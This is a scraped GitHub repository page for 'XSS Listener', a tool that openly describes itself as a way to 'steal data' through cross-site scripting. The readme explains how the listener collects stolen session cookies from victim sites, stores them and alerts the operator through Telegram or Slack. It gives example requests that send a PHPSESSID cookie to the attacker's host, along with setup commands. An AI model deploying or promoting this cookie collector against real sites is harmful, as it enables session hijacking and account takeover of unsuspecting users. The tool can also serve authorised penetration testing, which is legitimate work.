Skip to content
🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.
Branch: master
Clone or download
willyb321 Merge pull request #7 from cagataycali/snyk-fix-3ea7c8ed
[Snyk Update] New fixes for 5 vulnerable dependency paths
Latest commit 87405b6 Mar 12, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.editorconfig
.env.example Update readme and add .env.example Sep 8, 2017
.gitignore WIP: slack integration Sep 8, 2017
LICENSE
app.json WIP: slack integration env vars Sep 8, 2017
index.js hotfix: missed a bit Sep 8, 2017
package.json fix: package.json to reduce vulnerabilities Mar 12, 2018
readme.md Update readme and add .env.example Sep 8, 2017
yarn.lock WIP: slack integration Sep 8, 2017

readme.md

logo

🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

From now on, you do not need XSS listeners! XSS listener records the data you have stolen on the remote site in the database, and gives instant notification with telegram / slack.

Deploy

🕸️ Know-How Background

🕸️ Listener Usage

Listener accepts all HTTP methods with parameters, then save database. Example:

GET https://yourapp.com/?cookie=PHPSESSID=889c6594db2541db1666cefca7537373

or

POST https://yourapp.com/
Form: { cookie:'PHPSESSID=889c6594db2541db1666cefca7537373' }

You will notify by telegram bot.

output

🕸️ Detailed Usage

🕸️ List previous requests

https://yourapp.com/list

🕸️ Delete previous request by id

https://yourapp.com/delete/[id]

🕸️ Even you can use telegram (and / or Slack!)

/list

/delete [id]

🕸️ Run local environment

In terminal,

git clone https://github.com/cagataycali/xss-listener.git; # Clone
cd xss-listener; # Change directory.
npm install; # Install dependencies.
cp .env.example .env
# Fill in .env with required values.
# Fill bot token and user id.
node index.js

License

MIT © Çağatay Çalı

You can’t perform that action at this time.